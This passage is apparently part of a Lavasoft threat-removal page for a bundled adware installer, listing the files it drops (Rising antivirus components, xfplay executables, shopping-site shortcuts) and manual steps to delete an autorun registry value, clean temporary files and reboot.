    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
    %Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
    %Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
    %Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
    %Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
    %Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网址导航.lnk (1 bytes)
    %Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
    %Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
    %Program Files%\tools\tools.exe (2532 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\快捷导航\打折网购.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
    %Documents and Settings%\%current user%\Favorites\全国最给力充值店-淘宝网.url (46 bytes)
    %Documents and Settings%\All Users\Desktop\网址导航.lnk (1 bytes)
    %Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-淘宝网.url (46 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网购.lnk (1 bytes)
    %Documents and Settings%\All Users\Desktop\打折网购.lnk (1 bytes)
    %Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
    %Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\快捷导航\网址导航.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
    %Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
    %Program Files%\xfplay\tools.exe (1530 bytes)
    %Program Files%\xfplay\bdupdate.exe (103612 bytes)
    %Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
    %Program Files%\xfplay\xianfeng.exe (197071 bytes)
    %Program Files%\xfplay\xianfengupdate.exe (16294 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now